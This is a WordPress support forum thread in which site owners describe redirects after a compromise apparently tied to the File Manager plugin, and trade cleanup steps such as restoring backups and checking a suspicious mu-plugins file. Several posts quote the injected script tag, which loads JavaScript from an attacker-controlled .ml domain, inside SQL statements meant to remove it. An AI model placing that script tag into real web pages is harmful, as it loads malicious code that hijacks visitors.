wordfence not really safe my site, now redirected

Hi guys –

Thanks for posting on this issue. I was able to solve this problem (hopefully permanently) by restoring the WordPress website from a backup.

I use Hostinger as my web host, and they back-up my site daily. I used a back-up from a week ago to get everything functioning again. Here is the link to how to accomplish that in Hostinger;
https://support.hostinger.com/en/articles/3989447-how-to-restore-wordpress-website-from-backups

After doing all of that I noticed that when I tried to login to my Wp-Admin portal on Chrome it still re-directed to the directednotcoverted.ml site…
However, I was able to login without any problem when I went onto an incognito window. I updated WordPress to 5.5.1 and then updated all the plugins as well (it seems like the issue originated on the File Manager plugin, which I updated to the newest version).

I also went into Chrome and deleted the cache from the last week.

Everything seems to be working for the moment…fingers crossed.

I am not much of a techie…but hopefully this helps someone out there!

Hola amigos, verifiquen si tienen un archivo llamado: rms_unique_wp_mu_pl_fl_nm.php en la carpeta: wp-content/mu-plugins/

Esto es lo que está ocasionando el problema. Todavía estoy tratando de solucionarlo

Hi All,
One of my clients has also this issue and I have solved it successfully. Let me know if you need my help.

contact me on Skype: mayurkoshti1994

Thanks.

after my backup today from 3.9. my site works god heavens and I no see manipulate files on the server. A german magazin tell, what maybe make the probs, you can translate the article in your language …

https://www.heise.de/security/meldung/Sicherheitsluecke-im-WordPress-Plugin-File-Manager-oeffnen-Websites-fuer-Angreifer-4884937.html

I have replaced the url using the UPDATE in the SQL database，but I still can’t get into my site. My website is hosting on Google cloud platform. How can I remove the other scrips? Please can you help, thanks
@safalshrestha @ochoarobert1@julioanampa

@killee if you have ssh access you can use a code editors like VS code and install an SSH/FTP plugin. With it you can connect to the server and open the files in VS Code directly.

You can go to ‘find and replace’ t9 search for the scripts.

Another way is to zip the project/app folder and download the file. Extract locally, open with any code editor, replace scripts, zip it and put in back.

This is not a wordfence problem but the result of some vulnerable settings you allowed in your wordpress configuration.

I fixed this issue in about 3 hours after studying what the malware is doing.

You can contact me if you want a very quick solution. No data loss guaranteed!

@safalshrestha Thank you very much for the guide. But I know nothing about code. I can connect to my vm through winscp&putty, but i can’t connect with vs code ssh plugin. I have been trying for half day. So difficult. Is there any other tool that is earsier to configure? The whole project seems too big to download and would take a lot of time. Thanks again!

@safalshrestha pardon me again. What should I do to be able to access the wordpress admin, so that I can restore with the backup files.

Hi @killee wp-admin wont work either until we clear those scripts. If you have a backup, you can remove/delete the current wordpress and install it again from the backup. However, this would depend on what kind of backup you have. Do you have a server backup or a wordpress backup. If wordpress, is it from updraft or duplicator or any other backup tool.

Hi @safalshrestha afalshrestha thank you for the reply! Yes, I have the wordpress backup file from updraft, I can see five files：others, uploads, themes, plugins, db.
Does that mean I can delete the wordpress and install it again? Which file should I delete? I am using the bitnami wordpress on Google cloud platform.

@killee I am not sure how hosts are configured in bitnami but I think you can delete the full installation and then create a new one.

After that login to new wordpress, install updraft and follow their restore procedure.

I would suggest you to try create a new wordpress installation before deleting this infected installation and restore the backup just to be sure everything is alright. If this performs okay, you can delete the infected and follow restore on same host name.

Also make sure the backup is recent enough though it shouldn’t be the most recent one that contains these scripts.

Hi,

I try to remove the script of the database using this:

UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", " "));

I have the alert:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near

src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'><...

at line 1

What can i do?

Best regards,

Memento

• This reply was modified 4 years, 6 months ago by Yui. Reason: please use CODE button for proper formatting

@memento2016 try this. That single quote might need to be escaped. Also someone mentioned that you might have different version of script. The last parameter can be n=ns3 or n=ns5.

Please try all variation it shows 0 record updated.

UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=\'https://scripts.lowerbeforwarden.ml/src.js?n=ns1\' type=\'text/javascript\'></script>", " "));

Hello @audiovalve and thanks for reaching out!

If you have any questions regarding the premium version feel free to put in a support ticket at https://support.wordfence.com and our team can help you with your issue.

As per the forum guidelines below, could everyone please open your own topic and we would be glad to assist you:
“Unless users have the exact same version of WordPress on the same physical server hosted by the same hosts with the same plugins, theme, and configurations, then the odds are the solution for one user will not be the same for another. For this reason, we recommend people start their own topics.”

For this issue, it seems like a site cleaning may need to be done due to a compromise.

Thanks!